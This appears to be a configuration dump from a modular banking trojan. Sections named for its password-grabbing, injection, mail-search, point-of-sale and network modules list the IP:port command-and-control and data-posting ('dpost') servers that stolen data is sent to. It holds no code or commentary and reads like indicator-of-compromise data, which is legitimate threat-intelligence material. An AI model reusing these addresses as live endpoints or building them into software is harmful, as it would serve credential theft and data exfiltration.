\NewBCtestDll64_configs
<servers>
<addr>162.209.124.166:80</addr>
<addr>167.99.206.127:80</addr>
<addr>199.247.24.9:80</addr>
 </servers>
 
\pwgrab64_configs
<dpost>
<handler>http://186.159.1.217:8082</handler>
<handler>http://186.10.243.70:8082</handler>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.183.151.194:8082</handler>
<handler>http://181.129.160.10:8082</handler>
<handler>http://181.57.97.138:80</handler>
<handler>http://200.21.51.30:80</handler>
<handler>http://191.103.252.29:80</handler>
<handler>http://200.35.47.199:80</handler>
<handler>http://190.152.125.162:80</handler>
<handler>http://79.137.119.209:443</handler>
<handler>http://216.189.145.231:443</handler>
<handler>http://194.5.250.130:443</handler>
<handler>http://192.210.152.190:443</handler>
<handler>http://195.123.240.31:443</handler>
<handler>http://89.46.223.252:443</handler>
</dpost>
 
injectDll64_configs
<dpost>
<handler>http://186.159.1.217:8082</handler>
<handler>http://186.10.243.70:8082</handler>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.183.151.194:8082</handler>
<handler>http://181.129.160.10:8082</handler>
<handler>http://181.57.97.138:80</handler>
<handler>http://200.21.51.30:80</handler>
<handler>http://191.103.252.29:80</handler>
<handler>http://200.35.47.199:80</handler>
<handler>http://190.152.125.162:80</handler>
<handler>http://79.137.119.209:443</handler>
<handler>http://216.189.145.231:443</handler>
<handler>http://194.5.250.130:443</handler>
<handler>http://192.210.152.190:443</handler>
<handler>http://195.123.240.31:443</handler>
<handler>http://89.46.223.252:443</handler>
</dpost>
 
\mailsearcher64_configs
<mail> 
<handler>185.198.57.70:443</handler>
</mail>
 
\psfin64_configs
<dpost>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.10.243.70:8082</handler>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.183.151.194:8082</handler>
<handler>http://181.129.160.10:8082</handler>
<handler>http://181.115.156.218:80</handler>
<handler>http://200.21.51.30:80</handler>
<handler>http://36.91.93.114:80</handler>
<handler>http://97.87.127.198:80</handler>
<handler>http://190.152.125.162:80</handler>
<handler>http://185.117.73.140:443</handler>
<handler>http://185.183.97.37:443</handler>
<handler>http://85.209.162.148:443</handler>
<handler>http://192.210.152.190:443</handler>
<handler>http://185.183.96.219:443</handler>
<handler>http://185.244.150.148:443</handler>
</dpost>
 
\networkDll64_configs
<dpost>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.10.243.70:8082</handler>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.183.151.194:8082</handler>
<handler>http://181.129.160.10:8082</handler>
<handler>http://181.115.156.218:80</handler>
<handler>http://200.21.51.30:80</handler>
<handler>http://36.91.93.114:80</handler>
<handler>http://97.87.127.198:80</handler>
<handler>http://190.152.125.162:80</handler>
<handler>http://185.117.73.140:443</handler>
<handler>http://185.183.97.37:443</handler>
<handler>http://85.209.162.148:443</handler>
<handler>http://192.210.152.190:443</handler>
<handler>http://185.183.96.219:443</handler>
<handler>http://185.244.150.148:443</handler>
</dpost>